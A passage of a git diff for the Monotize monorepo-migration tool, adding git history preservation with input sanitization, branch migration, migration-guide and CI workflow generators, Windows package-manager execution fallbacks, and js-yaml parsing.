'../types/index.js'; +import { readJson, pathExists } from '../utils/fs.js'; +import path from 'node:path'; + +/** + * Generate package manager overrides/resolutions from resolved conflict decisions. + */ +export function generateOverrides( + conflicts: DependencyConflict[], + decisions: PlanDecision[], + _pmType: PackageManagerType, +): Record { + const overrides: Record = {}; + + for (const conflict of conflicts) { + // Find the decision for this conflict + const decision = decisions.find((d) => d.id === `dep-${conflict.name}`); + const resolvedVersion = decision?.chosen || conflict.versions[0]?.version; + + if (resolvedVersion) { + overrides[conflict.name] = resolvedVersion; + } + } + + return overrides; +} + +/** + * Get the correct key name for overrides based on package manager. + */ +export function getOverridesKey(pmType: PackageManagerType): string { + switch (pmType) { + case 'pnpm': + return 'pnpm.overrides'; + case 'yarn': + case 'yarn-berry': + return 'resolutions'; + case 'npm': + return 'overrides'; + } +} + +/** + * Normalize internal dependencies to use workspace protocol. + */ +export function normalizeToWorkspaceProtocol( + _rootPkgJson: Record, + packages: PackageInfo[], + workspaceProtocol: string, +): Array<{ packageName: string; dependency: string; from: string; to: string }> { + const updates: Array<{ packageName: string; dependency: string; from: string; to: string }> = []; + const packageNames = new Set(packages.map((p) => p.name)); + + for (const pkg of packages) { + for (const depType of ['dependencies', 'devDependencies'] as const) { + const deps = pkg[depType]; + if (!deps) continue; + + for (const [dep, version] of Object.entries(deps)) { + if (packageNames.has(dep) && !version.startsWith('workspace:')) { + updates.push({ + packageName: pkg.name, + dependency: dep, + from: version, + to: workspaceProtocol, + }); + } + } + } + } + + return updates; +} + +/** + * Apply overrides to root package.json in-place. + */ +export function applyOverridesToPackageJson( + rootPkgJson: Record, + overrides: Record, + pmType: PackageManagerType, +): Record { + const result = { ...rootPkgJson }; + const key = getOverridesKey(pmType); + + if (key === 'pnpm.overrides') { + // Nested under pnpm key + const pnpmConfig = (result.pnpm as Record) || {}; + pnpmConfig.overrides = overrides; + result.pnpm = pnpmConfig; + } else { + result[key] = overrides; + } + + return result; +} + +/** + * Verify that enforcement is properly configured. + */ +export async function verifyEnforcement( + monorepoDir: string, + pmType: PackageManagerType, +): Promise { + const checks: VerifyCheck[] = []; + const rootPkgPath = path.join(monorepoDir, 'package.json'); + + if (!(await pathExists(rootPkgPath))) { + checks.push({ + id: 'enforcement-no-root-pkg', + message: 'No root package.json found', + status: 'fail', + tier: 'static', + }); + return checks; + } + + try { + const rootPkg = (await readJson(rootPkgPath)) as Record; + const key = getOverridesKey(pmType); + + if (key === 'pnpm.overrides') { + const pnpmConfig = rootPkg.pnpm as Record | undefined; + const overrides = pnpmConfig?.overrides as Record | undefined; + if (overrides && Object.keys(overrides).length > 0) { + checks.push({ + id: 'enforcement-overrides-present', + message: `pnpm overrides configured (${Object.keys(overrides).length} entries)`, + status: 'pass', + tier: 'static', + }); + } else { + checks.push({ + id: 'enforcement-overrides-missing', + message: 'No pnpm overrides configured', + status: 'warn', + tier: 'static', + details: 'Consider adding pnpm.overrides to enforce dependency versions', + }); + } + } else { + const overrides = rootPkg[key] as Record | undefined; + if (overrides && Object.keys(overrides).length > 0) { + checks.push({ + id: 'enforcement-overrides-present', + message: `${key} configured (${Object.keys(overrides).length} entries)`, + status: 'pass', + tier: 'static', + }); + } else { + checks.push({ + id: 'enforcement-overrides-missing', + message: `No ${key} configured`, + status: 'warn', + tier: 'static', + details: `Consider adding ${key} to enforce dependency versions`, + }); + } + } + } catch { + checks.push({ + id: 'enforcement-parse-error', + message: 'Could not parse root package.json', + status: 'fail', + tier: 'static', + }); + } + + return checks; +} diff --git a/src/strategies/history-preserve.ts b/src/strategies/history-preserve.ts index c42f95f..7926fe3 100755 --- a/src/strategies/history-preserve.ts +++ b/src/strategies/history-preserve.ts @@ -10,7 +10,8 @@ export async function checkGitFilterRepo(): Promise { try { execFileSync('git', ['filter-repo', '--version'], { stdio: 'pipe' }); return true; - } catch { + } catch (_err) { + // git filter-repo not installed or not on PATH return false; } } @@ -25,11 +26,20 @@ async function isGitRepo(dir: string): Promise { stdio: 'pipe', }); return true; - } catch { + } catch (_err) { + // Not a git repository return false; } } +/** + * Sanitize a string for safe use in a Python bytes literal. + * Removes any characters that could break out of the string. + */ +function sanitizeForPython(s: string): string { + return s.replace(/[^a-zA-Z0-9 _\-\[\]().,:;!?#@&+=]/g, ''); +} + /** * Preserve git history using git filter-repo * Rewrites paths and optionally prefixes commit messages @@ -46,12 +56,14 @@ async function preserveHistoryWithFilterRepo( await copyDir(repoPath, workingDir); try { - // Rewrite paths to be under targetDir - const filterArgs = ['filter-repo', '--force', `--path-rename`, `:${targetDir}/`]; + // Validate targetDir doesn't contain dangerous characters + const safeTargetDir = targetDir.replace(/[^a-zA-Z0-9_\-./]/g, ''); + const filterArgs = ['filter-repo', '--force', '--path-rename', `:${safeTargetDir}/`]; // Add commit message prefix if specified if (commitPrefix) { - filterArgs.push('--message-callback', `return b"${commitPrefix}" + message`); + const safePrefix = sanitizeForPython(commitPrefix); + filterArgs.push('--message-callback', `return b"${safePrefix}" + message`); } execFileSync('git', filterArgs, { @@ -68,8 +80,8 @@ async function preserveHistoryWithFilterRepo( cwd: outputPath, stdio: 'pipe', }); - } catch { - // Remote doesn't exist, which is fine + } catch (_err) { + // Remote doesn't exist yet, safe to ignore } execFileSync('git', ['remote', 'add', remoteName, workingDir], { @@ -88,15 +100,15 @@ async function preserveHistoryWithFilterRepo( cwd: outputPath, stdio: 'pipe', }); - } catch { - // Try with master branch + } catch (_err) { + // main branch merge failed, try master try { execFileSync('git', ['merge', `${remoteName}/master`, '--allow-unrelated-histories', '--no-edit'], { cwd: outputPath, stdio: 'pipe', }); - } catch { - // Try to find the default branch + } catch (_err) { + // master branch merge also failed, try to find the default branch const branches = execFileSync('git', ['branch', '-r'], { cwd: outputPath, encoding: 'utf-8', @@ -105,6 +117,7 @@ async function preserveHistoryWithFilterRepo( const remoteBranch = branches .split('\n') .map((b) => b.trim()) + .filter((b) => !b.includes('->')) .find((b) => b.startsWith(`${remoteName}/`)); if (remoteBranch) { @@ -128,8 +141,8 @@ async function preserveHistoryWithFilterRepo( try { const fs = await import('fs-extra'); await fs.remove(workingDir); - } catch { - // Ignore cleanup errors + } catch (_err) { + // Cleanup of working directory failed; non-fatal } } } @@ -145,17 +158,15 @@ async function preserveHistoryWithSubtree( ): Promise { const { targetDir } = options; - // Ensure the target directory exists - await ensureDir(path.join(outputPath, targetDir)); - // Check if repo has commits try { execFileSync('git', ['rev-parse', 'HEAD'], { cwd: repoPath, stdio: 'pipe', }); - } catch { - // No commits, just copy files + } catch (_err) { + // No commits in repo, just copy files + await ensureDir(path.join(outputPath, targetDir)); await copyDir(repoPath, path.join(outputPath, targetDir)); return; } @@ -169,8 +180,8 @@ async function preserveHistoryWithSubtree( cwd: outputPath, stdio: 'pipe', }); - } catch { - // Remote doesn't exist, which is fine + } catch (_err) { + // Remote doesn't exist yet, safe to ignore } execFileSync('git', ['remote', 'add', remoteName, repoPath], { @@ -196,18 +207,19 @@ async function preserveHistoryWithSubtree( } else if (branches.includes(`${remoteName}/master`)) { defaultBranch = 'master'; } else { - // Find any branch from this remote + // Find any branch from this remote (skip HEAD -> symbolic refs) const remoteBranch = branches .split('\n') .map((b) => b.trim()) + .filter((b) => !b.includes('->')) .find((b) => b.startsWith(`${remoteName}/`)); if (remoteBranch) { defaultBranch = remoteBranch.replace(`${remoteName}/`, ''); } } - } catch { - // Use default + } catch (_err) { + // Could not list remote branches, use default } // Use subtree add to merge with history @@ -262,13 +274,30 @@ export async function preserveHistory( stdio: 'pipe', }); + // Ensure commits can be created in fresh CI environments without global git config. + const commitName = + process.env.GIT_AUTHOR_NAME || process.env.GIT_COMMITTER_NAME || 'monotize'; + const commitEmail = + process.env.GIT_AUTHOR_EMAIL || + process.env.GIT_COMMITTER_EMAIL || + 'monotize@example.com'; + + execFileSync('git', ['config', 'user.name', commitName], { + cwd: outputPath, + stdio: 'pipe', + }); + execFileSync('git', ['config', 'user.email', commitEmail], { + cwd: outputPath, + stdio: 'pipe', + }); + // Create initial commit if needed try { execFileSync('git', ['rev-parse', 'HEAD'], { cwd: outputPath, stdio: 'pipe', }); - } catch { + } catch (_err) { // No commits yet, create an initial commit execFileSync('git', ['commit', '--allow-empty', '-m', 'Initial commit'], { cwd: outputPath, @@ -287,6 +316,81 @@ export async function preserveHistory( } } +/** + * Check all prerequisites for history preservation. + * Returns ok:true if all checks pass, or a list of issues. + */ +export async function checkHistoryPrerequisites( + repoPath: string, +): Promise<{ ok: boolean; issues: string[] }> { + const issues: string[] = []; + + // Check git is available + try { + execFileSync('which', ['git'], { stdio: 'pipe' }); + } catch (_err) { + issues.push('git is not installed or not on PATH'); + } + + // Check source is a git repo + if (!(await isGitRepo(repoPath))) { + issues.push(`${repoPath} is not a git repository`); + return { ok: false, issues }; + } + + // Check for shallow clone + try { + const result = execFileSync('git', ['rev-parse', '--is-shallow-repository'], { + cwd: repoPath, + encoding: 'utf-8', + }); + if (result.trim() === 'true') { + issues.push('Repository is a shallow clone. Run `git fetch --unshallow` first.'); + } + } catch (_err) { + // Older git versions don't support --is-shallow-repository, skip + } + + // Check git-filter-repo availability + const hasFilterRepo = await checkGitFilterRepo(); + if (!hasFilterRepo) { + issues.push('git-filter-repo is not installed (will fall back to git subtree)'); + } + + return { ok: issues.length === 0, issues }; +} + +/** + * Generate a dry-run report for history preservation. + * Shows commit count, contributors, and estimated time without making changes. + */ +export async function historyDryRun( + repoPath: string, + _targetDir: string, +): Promise<{ + commitCount: number; + contributors: string[]; + estimatedSeconds: number; + hasFilterRepo: boolean; + strategy: 'filter-repo' | 'subtree'; +}> { + const commitCount = await getCommitCount(repoPath); + const contributors = await getContributors(repoPath); + const hasFilterRepo = await checkGitFilterRepo(); + + // Rough estimate: ~0.5s per commit for filter-repo, ~0.2s for subtree + const secondsPerCommit = hasFilterRepo ? 0.5 : 0.2; + const estimatedSeconds = Math.max(1, Math.ceil(commitCount * secondsPerCommit)); + + return { + commitCount, + contributors, + estimatedSeconds, + hasFilterRepo, + strategy: hasFilterRepo ? 'filter-repo' : 'subtree', + }; +} + /** * Get the commit count for a repository */ @@ -297,7 +401,8 @@ export async function getCommitCount(repoPath: string): Promise { encoding: 'utf-8', }); return parseInt(result.trim(), 10); - } catch { + } catch (_err) { + // No commits or git error; return 0 return 0; } } @@ -319,7 +424,8 @@ export async function getContributors(repoPath: string): Promise { .filter((line) => line.length > 0) ); return [...contributors].sort(); - } catch { + } catch (_err) { + // No commits or git error; return empty return []; } } diff --git a/src/strategies/migrate-branch.ts b/src/strategies/migrate-branch.ts new file mode 100755 index 0000000..81d7336 --- /dev/null +++ b/src/strategies/migrate-branch.ts @@ -0,0 +1,287 @@ +import path from 'node:path'; +import type { BranchPlan, BranchMigrateStrategy, Logger, PlanOperation } from '../types/index.js'; +import { safeExecFile, commandExists } from '../utils/exec.js'; +import { pathExists } from '../utils/fs.js'; + +/** + * Check prerequisites for branch migration + */ +export async function checkBranchMigratePrerequisites( + sourceRepo: string, + targetMonorepo: string, + strategy: BranchMigrateStrategy, +): Promise<{ ok: boolean; issues: string[] }> { + const issues: string[] = []; + + // Check source repo exists + if (!(await pathExists(sourceRepo))) { + issues.push(`Source repository not found: ${sourceRepo}`); + } + + // Check target monorepo exists + if (!(await pathExists(targetMonorepo))) { + issues.push(`Target monorepo not found: ${targetMonorepo}`); + } + + // Check git is available + const hasGit = await commandExists('git'); + if (!hasGit) { + issues.push('git is not installed or not on PATH'); + } + + // Check for shallow clone + if (await pathExists(sourceRepo)) { + try { + const { stdout } = await safeExecFile('git', ['rev-parse', '--is-shallow-repository'], { + cwd: sourceRepo, + }); + if (stdout.trim() === 'true') { + issues.push('Source repository is a shallow clone. Run `git fetch --unshallow` first.'); + } + } catch { + // Not a git repo or other error + issues.push('Source path is not a valid git repository'); + } + } + + // Strategy-specific checks + if (strategy === 'subtree') { + // git subtree is built-in to git, no extra check needed + } else if (strategy === 'replay') { + // git format-patch and git am are built-in + } + + return { ok: issues.length === 0, issues }; +} + +/** + * Get dry-run report for a branch migration + */ +export async function branchMigrateDryRun( + sourceRepo: string, + branch: string, +): Promise<{ commitCount: number; estimatedTime: string; contributors: string[] }> { + try { + // Count commits on the branch + const { stdout: logOutput } = await safeExecFile( + 'git', + ['log', branch, '--oneline', '--no-merges'], + { cwd: sourceRepo }, + ); + const commitCount = logOutput.trim().split('\n').filter(Boolean).length; + + // Get contributors + const { stdout: authorOutput } = await safeExecFile( + 'git', + ['log', branch, '--format=%aN', '--no-merges'], + { cwd: sourceRepo }, + ); + const contributors = [...new Set(authorOutput.trim().split('\n').filter(Boolean))]; + + // Estimate time based on commit count + const secondsPerCommit = 0.5; + const totalSeconds = Math.ceil(commitCount * secondsPerCommit); + const estimatedTime = + totalSeconds < 60 + ? `${totalSeconds} seconds` + : `${Math.ceil(totalSeconds / 60)} minutes`; + + return { commitCount, estimatedTime, contributors }; + } catch { + return { commitCount: 0, estimatedTime: 'unknown', contributors: [] }; + } +} + +/** + * Generate a BranchPlan for migrating a branch + */ +export async function generateBranchPlan( + branch: string, + sourceRepo: string, + targetMonorepo: string, + strategy: BranchMigrateStrategy, + logger: Logger, +): Promise { + const srcPath = path.resolve(sourceRepo); + const targetPath = path.resolve(targetMonorepo); + + // Check prerequisites + const prereqs = await checkBranchMigratePrerequisites(srcPath, targetPath, strategy); + if (!prereqs.ok) { + throw new Error(`Prerequisites not met:\n${prereqs.issues.map((i) => ` - ${i}`).join('\n')}`); + } + + logger.info(`Generating branch migration plan: ${branch} (${strategy} strategy)`); + + // Get dry-run report + const dryRunReport = await branchMigrateDryRun(srcPath, branch); + logger.info(`Found ${dryRunReport.commitCount} commits from ${dryRunReport.contributors.length} contributors`); + + // Generate operations based on strategy + const operations: PlanOperation[] = []; + + if (strategy === 'subtree') { + operations.push( + { + id: 'add-remote', + type: 'exec', + description: `Add source repo as remote`, + inputs: [srcPath], + outputs: [], + }, + { + id: 'subtree-add', + type: 'exec', + description: `Import branch ${branch} via git subtree add`, + inputs: [branch], + outputs: [], + }, + { + id: 'remove-remote', + type: 'exec', + description: 'Remove temporary remote', + inputs: [], + outputs: [], + }, + ); + } else { + // replay strategy + operations.push( + { + id: 'format-patch', + type: 'exec', + description: `Export ${dryRunReport.commitCount} commits as patches`, + inputs: [srcPath, branch], + outputs: ['patches/'], + }, + { + id: 'create-branch', + type: 'exec', + description: `Create branch ${branch} in target`, + inputs: [], + outputs: [branch], + }, + { + id: 'apply-patches', + type: 'exec', + description: 'Replay patches via git am', + inputs: ['patches/'], + outputs: [], + }, + ); + } + + return { + schemaVersion: 1, + createdAt: new Date().toISOString(), + branch, + sourceRepo: srcPath, + targetMonorepo: targetPath, + strategy, + operations, + dryRunReport, + }; +} + +/** + * Apply a BranchPlan using subtree strategy + */ +async function applySubtreeImport( + plan: BranchPlan, + subdir: string, + logger: Logger, +): Promise { + const { sourceRepo, branch, targetMonorepo } = plan; + const remoteName = `monotize-import-${Date.now()}`; + + try { + // Add remote + logger.info(`Adding remote ${remoteName}...`); + await safeExecFile('git', ['remote', 'add', remoteName, sourceRepo], { + cwd: targetMonorepo, + }); + + // Fetch + logger.info(`Fetching ${branch}...`); + await safeExecFile('git', ['fetch', remoteName, branch], { + cwd: targetMonorepo, + }); + + // Subtree add + logger.info(`Importing via subtree add to ${subdir}...`); + await safeExecFile( + 'git', + ['subtree', 'add', `--prefix=${subdir}`, `${remoteName}/${branch}`, '--squash'], + { cwd: targetMonorepo }, + ); + + logger.success(`Branch ${branch} imported to ${subdir}`); + } finally { + // Cleanup remote + try { + await safeExecFile('git', ['remote', 'remove', remoteName], { + cwd: targetMonorepo, + }); + } catch { + // Ignore cleanup errors + } + } +} + +/** + * Apply a BranchPlan using patch replay strategy + */ +async function applyPatchReplay( + plan: BranchPlan, + subdir: string, + logger: Logger, +): Promise { + const { sourceRepo, branch, targetMonorepo } = plan; + + // Export patches + logger.info(`Exporting patches from ${branch}...`); + const patchDir = path.join(targetMonorepo, '.monotize', 'patches', branch); + const { ensureDir } = await import('../utils/fs.js'); + await ensureDir(patchDir); + + await safeExecFile( + 'git', + ['format-patch', `main..${branch}`, '-o', patchDir], + { cwd: sourceRepo }, + ); + + // Create branch in target + logger.info(`Creating branch ${branch} in target...`); + await safeExecFile('git', ['checkout', '-b', branch], { + cwd: targetMonorepo, + }); + + // Apply patches + logger.info('Replaying patches...'); + try { + await safeExecFile( + 'git', + ['am', '--directory', subdir, `${patchDir}/*.patch`], + { cwd: targetMonorepo }, + ); + logger.success(`Branch ${branch} replayed to ${subdir}`); + } catch (err: unknown) { + logger.warn('Patch replay may have conflicts. Check with `git am --show-current-patch`'); + throw err; + } +} + +/** + * Apply a BranchPlan + */ +export async function applyBranchPlan( + plan: BranchPlan, + subdir: string, + logger: Logger, +): Promise { + if (plan.strategy === 'subtree') { + await applySubtreeImport(plan, subdir, logger); + } else { + await applyPatchReplay(plan, subdir, logger); + } +} diff --git a/src/strategies/migration-doc.ts b/src/strategies/migration-doc.ts new file mode 100755 index 0000000..0916ba4 --- /dev/null +++ b/src/strategies/migration-doc.ts @@ -0,0 +1,134 @@ +import type { ExtendedAnalysis, AnalyzeResult, RiskSummary } from '../types/index.js'; + +/** + * Generate a MIGRATION.md document from analysis results. + */ +export function generateMigrationDoc( + analysis: AnalyzeResult, + extended?: ExtendedAnalysis, +): string { + const lines: string[] = []; + + lines.push('# Migration Guide'); + lines.push(''); + lines.push(`> Generated by Monotize on ${new Date().toISOString()}`); + lines.push(''); + + // Risk Summary + if (extended?.riskSummary) { + lines.push('## Risk Assessment'); + lines.push(''); + lines.push(`**Classification:** ${formatClassification(extended.riskSummary)}`); + lines.push(''); + if (extended.riskSummary.reasons.length > 0) { + lines.push('**Reasons:**'); + for (const reason of extended.riskSummary.reasons) { + lines.push(`- ${reason}`); + } + lines.push(''); + } + } + + // Top Risks + if (extended?.riskSummary?.topFindings?.length) { + lines.push('## Top Risks'); + lines.push(''); + for (const finding of extended.riskSummary.topFindings) { + lines.push(`### ${finding.title}`); + lines.push(''); + lines.push(`- **Severity:** ${finding.severity}`); + lines.push(`- **Action:** ${finding.suggestedAction}`); + if (finding.evidence.length > 0) { + lines.push(`- **Evidence:**`); + for (const e of finding.evidence.slice(0, 3)) { + lines.push(` - ${e.path}${e.snippet ? `: ${e.snippet}` : ''}`); + } + } + lines.push(''); + } + } + + // Complexity + lines.push('## Complexity'); + lines.push(''); + lines.push(`- **Score:** ${analysis.complexityScore}/100`); + lines.push(`- **Packages:** ${analysis.packages.length}`); + lines.push(`- **Conflicts:** ${analysis.conflicts.length}`); + lines.push(`- **File Collisions:** ${analysis.collisions.length}`); + if (analysis.circularDependencies?.length) { + lines.push(`- **Circular Dependencies:** ${analysis.circularDependencies.length}`); + } + lines.push(''); + + // Required Decisions + if (analysis.findings?.decisions?.length) { + lines.push('## Required Decisions'); + lines.push(''); + for (const decision of analysis.findings.decisions) { + lines.push(`- [ ] **${decision.kind}**: ${decision.description}`); + if (decision.suggestedAction) { + lines.push(` - Suggested: ${decision.suggestedAction}`); + } + } + lines.push(''); + } + + // Suggested Order of Operations + lines.push('## Suggested Order of Operations'); + lines.push(''); + lines.push('1. **Prepare** - Standardize Node.js versions, package managers, and build scripts'); + lines.push('2. **Plan** - Generate and review the migration plan'); + lines.push('3. **Merge** - Execute the migration'); + lines.push('4. **Configure** - Set up shared tooling (TypeScript, ESLint, Prettier)'); + lines.push('5. **Verify** - Run verification checks'); + lines.push('6. **Archive** - Deprecate source repositories'); + lines.push(''); + + // Extended sections + if (extended) { + const sections: Array<{ title: string; findings: typeof extended.environment }> = [ + { title: 'Environment', findings: extended.environment }, + { title: 'Package Manager', findings: extended.packageManager }, + { title: 'Tooling', findings: extended.tooling }, + { title: 'CI/CD', findings: extended.ci }, + { title: 'Publishing', findings: extended.publishing }, + { title: 'Repository Risks', findings: extended.repoRisks }, + ]; + + for (const section of sections) { + if (section.findings.length === 0) continue; + lines.push(`## ${section.title}`); + lines.push(''); + for (const f of section.findings) { + const icon = f.severity === 'critical' || f.severity === 'error' ? '!!' : + f.severity === 'warn' ? '!' : 'i'; + lines.push(`- [${icon}] ${f.title}`); + lines.push(` - ${f.suggestedAction}`); + } + lines.push(''); + } + } + + // Recommendations + if (analysis.recommendations.length > 0) { + lines.push('## Recommendations'); + lines.push(''); + for (const rec of analysis.recommendations) { + lines.push(`- ${rec}`); + } + lines.push(''); + } + + return lines.join('\n'); +} + +function formatClassification(summary: RiskSummary): string { + switch (summary.classification) { + case 'straightforward': + return 'Straightforward - Migration should be smooth'; + case 'needs-decisions': + return 'Needs Decisions - Some items require human judgment'; + case 'complex': + return 'Complex - Significant manual work required'; + } +} diff --git a/src/strategies/multilang-scaffold.ts b/src/strategies/multilang-scaffold.ts new file mode 100755 index 0000000..6ef2c19 --- /dev/null +++ b/src/strategies/multilang-scaffold.ts @@ -0,0 +1,78 @@ +import type { PlanFile, LanguageDetection, AnalysisFinding } from '../types/index.js'; + +/** + * Extract languages of a specific type from detections. + */ +function filterByLanguage( + detections: LanguageDetection[], + lang: 'go' | 'rust' | 'python', +): Array<{ repoName: string; markers: string[]; metadata?: Record }> { + const results: Array<{ repoName: string; markers: string[]; metadata?: Record }> = []; + for (const detection of detections) { + for (const language of detection.languages) { + if (language.name === lang) { + results.push({ + repoName: detection.repoName, + markers: language.markers, + metadata: language.metadata, + }); + } + } + } + return results; +} + +/** + * Generate go.work for Go modules. + */ +export function scaffoldGoWorkspace( + detections: LanguageDetection[], + packagesDir: string, +): PlanFile { + const goModules = filterByLanguage(detections, 'go'); + const useDirectives = goModules + .map((m) => `\t./${packagesDir}/${m.repoName}`) + .join('\n'); + + return { + relativePath: 'go.work', + content: `go 1.21\n\nuse (\n${useDirectives}\n)\n`, + }; +} + +/** + * Generate workspace Cargo.toml for Rust crates. + */ +export function scaffoldRustWorkspace( + detections: LanguageDetection[], + packagesDir: string, +): PlanFile { + const crates = filterByLanguage(detections, 'rust'); + const members = crates + .map((c) => ` "${packagesDir}/${c.repoName}"`) + .join(',\n'); + + return { + relativePath: 'Cargo.toml', + content: `[workspace]\nmembers = [\n${members}\n]\n`, + }; +} + +/** + * Generate recommendations for Python projects (no standard workspace protocol). + */ +export function generatePythonRecommendations( + detections: LanguageDetection[], +): AnalysisFinding[] { + const pyProjects = filterByLanguage(detections, 'python'); + return pyProjects.map((p) => ({ + id: `python-workspace-${p.repoName}`, + title: `Python project detected in ${p.repoName}`, + severity: 'info' as const, + confidence: 'high' as const, + evidence: [{ path: p.markers[0] }], + suggestedAction: p.markers[0] === 'pyproject.toml' + ? 'Consider using uv workspaces or poetry for Python monorepo management' + : 'Consider migrating from requirements.txt to pyproject.toml for better monorepo support', + })); +} diff --git a/src/strategies/package-manager.ts b/src/strategies/package-manager.ts index 6aa62c5..393c861 100755 --- a/src/strategies/package-manager.ts +++ b/src/strategies/package-manager.ts @@ -3,13 +3,46 @@ import path from 'node:path'; import type { PackageManagerType, PackageManagerConfig } from '../types/index.js'; import { pathExists } from '../utils/fs.js'; +function quoteForCmd(arg: string): string { + if (!/[\s"]/u.test(arg)) return arg; + return `"${arg.replace(/"/g, '""')}"`; +} + +function execPackageManager( + command: string, + args: string[], + options: { encoding: 'utf-8' } | { stdio: 'pipe' }, +): string { + if (process.platform !== 'win32') { + return execFileSync(command, args, options).toString(); + } + + const commandLine = [command, ...args].map(quoteForCmd).join(' '); + const attempts: Array<{ cmd: string; args: string[] }> = [ + { cmd: command, args }, + { cmd: `${command}.cmd`, args }, + { cmd: 'cmd.exe', args: ['/d', '/s', '/c', commandLine] }, + ]; + + let lastError: unknown; + for (const attempt of attempts) { + try { + return execFileSync(attempt.cmd, attempt.args, options).toString(); + } catch (error) { + lastError = error; + } + } + + throw lastError; +} + /** * Get the installed version of a package manager */ export function getPackageManagerVersion(pm: PackageManagerType): string { const command = pm === 'yarn-berry' ? 'yarn' : pm; try { - const version = execFileSync(command, ['--version'], { encoding: 'utf-8' }).trim(); + const version = execPackageManager(command, ['--version'], { encoding: 'utf-8' }).trim(); return version; } catch { // Default fallback versions @@ -32,7 +65,7 @@ export function getPackageManagerVersion(pm: PackageManagerType): string { export function isPackageManagerInstalled(pm: PackageManagerType): boolean { const command = pm === 'yarn-berry' ? 'yarn' : pm; try { - execFileSync(command, ['--version'], { stdio: 'pipe' }); + execPackageManager(command, ['--version'], { stdio: 'pipe' }); return true; } catch { return false; @@ -75,7 +108,7 @@ export async function isYarnBerry(dirPath?: string): Promise { // Check yarn version try { - const version = execFileSync('yarn', ['--version'], { encoding: 'utf-8' }).trim(); + const version = execPackageManager('yarn', ['--version'], { encoding: 'utf-8' }).trim(); const majorVersion = parseInt(version.split('.')[0], 10); return majorVersion >= 2; } catch { @@ -269,6 +302,13 @@ export function getPackageManagerField(pm: PackageManagerConfig): string { * Parse package manager type from CLI input */ export function parsePackageManagerType(input: string): PackageManagerType { + return tryParsePackageManagerType(input) ?? 'pnpm'; +} + +/** + * Parse package manager type from CLI input, returning null for invalid values. + */ +export function tryParsePackageManagerType(input: string): PackageManagerType | null { const normalized = input.toLowerCase().trim(); switch (normalized) { @@ -284,7 +324,7 @@ export function parsePackageManagerType(input: string): PackageManagerType { case 'npm': return 'npm'; default: - return 'pnpm'; // Default to pnpm + return null; } } diff --git a/src/strategies/workflow-generator.ts b/src/strategies/workflow-generator.ts new file mode 100755 index 0000000..48f712c --- /dev/null +++ b/src/strategies/workflow-generator.ts @@ -0,0 +1,117 @@ +import type { PlanFile } from '../types/index.js'; + +export interface WorkflowGeneratorOptions { + /** Package manager command (e.g. 'pnpm', 'yarn', 'npm') */ + packageManager?: string; + /** Default verify tier for CI */ + verifyTier?: 'static' | 'install' | 'full'; + /** Node.js version for CI */ + nodeVersion?: string; +} + +/** + * Generate a path-filtered GitHub Actions workflow for a monorepo. + * Each package gets its own path filter so only affected packages are tested. + */ +export function generatePathFilteredWorkflow( + packageNames: string[], + packagesDir: string, + options: WorkflowGeneratorOptions = {}, +): PlanFile { + const pm = options.packageManager || 'pnpm'; + const nodeVersion = options.nodeVersion || '20'; + const installCmd = pm === 'npm' ? 'npm ci' : pm === 'yarn' ? 'yarn install --frozen-lockfile' : 'pnpm install --frozen-lockfile'; + const pmSetup = pm === 'pnpm' ? ` + - name: Setup pnpm + uses: pnpm/action-setup@v4 + with: + version: 9` : ''; + + // Build path filters for each package + const pathFilters = packageNames + .map((pkg) => ` ${pkg}:\n - '${packagesDir}/${pkg}/**'`) + .join('\n'); + + // Build matrix entries + const matrixIncludes = packageNames + .map((pkg) => ` - package: ${pkg}`) + .join('\n'); + + const content = `# Generated by Monotize - path-filtered CI workflow +name: CI + +on: + push: + branches: [main, master] + paths: +${packageNames.map((pkg) => ` - '${packagesDir}/${pkg}/**'`).join('\n')} + - 'package.json' + - 'pnpm-lock.yaml' + - '.github/workflows/monotize-ci.yml' + pull_request: + branches: [main, master] + paths: +${packageNames.map((pkg) => ` - '${packagesDir}/${pkg}/**'`).join('\n')} + - 'package.json' + - 'pnpm-lock.yaml' + - '.github/workflows/monotize-ci.yml' + +jobs: + detect-changes: + runs-on: ubuntu-latest + outputs: +${packageNames.map((pkg) => ` ${pkg}: \${{ steps.filter.outputs.${pkg} }}`).join('\n')} + steps: + - uses: actions/checkout@v4 + - uses: dorny/paths-filter@v3 + id: filter + with: + filters: | +${pathFilters} + + build-test: + needs: detect-changes + runs-on: ubuntu-latest + strategy: + fail-fast: false + matrix: + include: +${matrixIncludes} + if: >- +${packageNames.map((pkg) => ` needs.detect-changes.outputs.${pkg} == 'true'`).join(' ||\n')} + steps: + - uses: actions/checkout@v4 + - uses: actions/setup-node@v4 + with: + node-version: '${nodeVersion}'${pmSetup} + + - name: Install dependencies + run: ${installCmd} + + - name: Build + run: ${pm} run build --filter=\${{ matrix.package }} 2>/dev/null || true + working-directory: . + + - name: Test + run: ${pm} run test --filter=\${{ matrix.package }} 2>/dev/null || true + working-directory: . +`; + + return { + relativePath: '.github/workflows/monotize-ci.yml', + content, + }; +} + +/** + * Move existing workflows to a legacy directory. + * Returns the list of files that would be moved (for plan serialization). + */ +export function planLegacyWorkflowMoves( + existingWorkflows: string[], +): Array<{ from: string; to: string }> { + return existingWorkflows.map((wf) => ({ + from: `.github/workflows/${wf}`, + to: `.github/workflows/legacy/${wf}`, + })); +} diff --git a/src/strategies/workflow-merge.ts b/src/strategies/workflow-merge.ts index 1e0b5f2..7026d56 100755 --- a/src/strategies/workflow-merge.ts +++ b/src/strategies/workflow-merge.ts @@ -1,4 +1,5 @@ import path from 'node:path'; +import yaml from 'js-yaml'; import type { WorkflowMergeOptions, WorkflowMergeStrategy } from '../types/index.js'; import { pathExists, readFile, writeFile, ensureDir, listFiles } from '../utils/fs.js'; @@ -40,209 +41,18 @@ interface WorkflowStep { } /** - * Parse YAML content into a workflow object - * Note: This is a simplified YAML parser for GitHub Actions workflows + * Parse YAML content into a workflow object using js-yaml */ function parseYaml(content: string): GitHubWorkflow { - const lines = content.split('\n'); - const result: Record = {}; - const stack: { indent: number; obj: Record; key?: string }[] = [ - { indent: -1, obj: result }, - ]; - - let currentArray: unknown[] | null = null; - let currentArrayKey: string | null = null; - let currentArrayIndent = 0; - - for (const line of lines) { - // Skip empty lines and comments - if (!line.trim() || line.trim().startsWith('#')) { - continue; - } - - const indent = line.search(/\S/); - const trimmed = line.trim(); - - // Handle array items - if (trimmed.startsWith('- ')) { - const value = trimmed.slice(2).trim(); - - if (currentArray && indent >= currentArrayIndent) { - if (value.includes(':')) { - // Object in array - const [objKey, objValue] = value.split(':').map((s) => s.trim()); - const obj: Record = {}; - if (objValue) { - obj[objKey] = parseValue(objValue); - } else { - obj[objKey] = null; - } - currentArray.push(obj); - } else { - 